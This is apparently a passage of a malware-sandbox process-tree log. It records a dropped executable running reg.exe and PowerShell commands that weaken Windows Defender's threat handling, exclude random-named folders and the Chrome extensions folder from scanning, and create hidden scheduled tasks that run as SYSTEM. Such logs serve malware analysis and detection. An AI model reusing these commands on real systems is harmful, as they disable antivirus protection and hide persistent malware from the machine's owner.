                                                                                                                                                                "C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 7c8e947828b1704c470f20016c0ff497
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:6980
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 660
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:7044
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jMOteh8S\mHT1r8Xpkx3IA.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jMOteh8S\mHT1r8Xpkx3IA.exe z0 /Rtdidb 757674 /S
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops desktop.ini file(s)
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:7676
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                              2⤵
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:7740
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:7892
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:7904
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:7920
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:7936
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:7952
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:7968
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:7984
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:8000
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:8016
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:8032
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:8048
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:8064
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:8080
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:8096
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:8112
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:8128
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:8144
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:8160
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:8176
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1020
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:8204
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:8220
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:8236
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:8252
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:8268
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:8284
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:8300
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:8316
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:8332
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        PID:8364
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:8508
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:8520
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:8536
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:8548
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:8564
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:8576
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:8596
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:8612
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:8628
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:8644
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:8660
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:8676
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:8692
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:8708
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:8724
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:8740
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:8756
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:8772
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:8788
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                              schtasks /CREATE /TN "ggkhFvaoT" /SC once /ST 04:10:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                              PID:5888
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                              schtasks /run /I /tn "ggkhFvaoT"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1696
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "ggkhFvaoT"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:9352
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 01:54:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\icUObAN.exe\" Wy /evKPdidPB 757674 /S" /V1 /F
                                                                                                                                                                                                                                                                  2⤵
